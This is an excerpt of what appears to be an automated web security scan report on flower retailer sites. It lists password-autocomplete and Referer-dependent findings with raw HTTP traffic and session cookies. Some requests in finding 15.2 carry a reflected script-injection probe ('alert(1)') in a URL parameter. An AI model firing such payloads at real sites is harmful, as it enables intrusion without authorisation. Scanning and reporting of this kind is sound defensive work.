Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<div class="n-chk-Signin n-chkTextAlign">    
       <form name="SignInForm" method="post" action="/signinactionForCheckout.do" id="SignInForm">    
       <input type="hidden" name="welcomePage" value="https://ww30.1800flowers.com/shipping.do" />
...[SNIP]...
<div>            
                               
        <input type="password" name="password" maxlength="64" value="" class="n-textfield"><br/>
...[SNIP]...
14.5. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:25 GMT
X-Varnish: 1301369291 1301357425
Age: 227
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/351/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...
14.6. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/350/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...
14.7. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:25 GMT
X-Varnish: 1301369291 1301357425
Age: 227
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/351/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...
14.8. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
14.9. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/350/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...
15. Referer-dependent response  previous  next
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Request 1

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815



<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
   Gift Options
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /><meta name="CODE_LANGUAGE" content="C#" /><meta name="vs_defaultClientScript" content="JavaScript" /><meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" />
       <META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/" />
       <div> <div Partner="PFC"> </div> </div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script> <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>
       

<script type="text/javascript">

/* function to move a row cell up one level based on its contents */
/* THIS FUNCTION IS
...[SNIP]...

Request 2

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_carousel&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:30 GMT
Content-Length: 219

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_carousel&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>
15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Request 1

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:23 GMT
Content-Length: 519

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&amp;scAddItem=true&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;trackingpgroup=PBS&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliveryon=True&amp;deliverydate=5%2f25%2f2011&amp;pid=30008396&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;flexChosen=False&amp;selectedrelationshipID=293461">here</a>.</h2>
</body></html>

Request 2

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:49 GMT
Content-Length: 254

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>
15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Request 1

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; 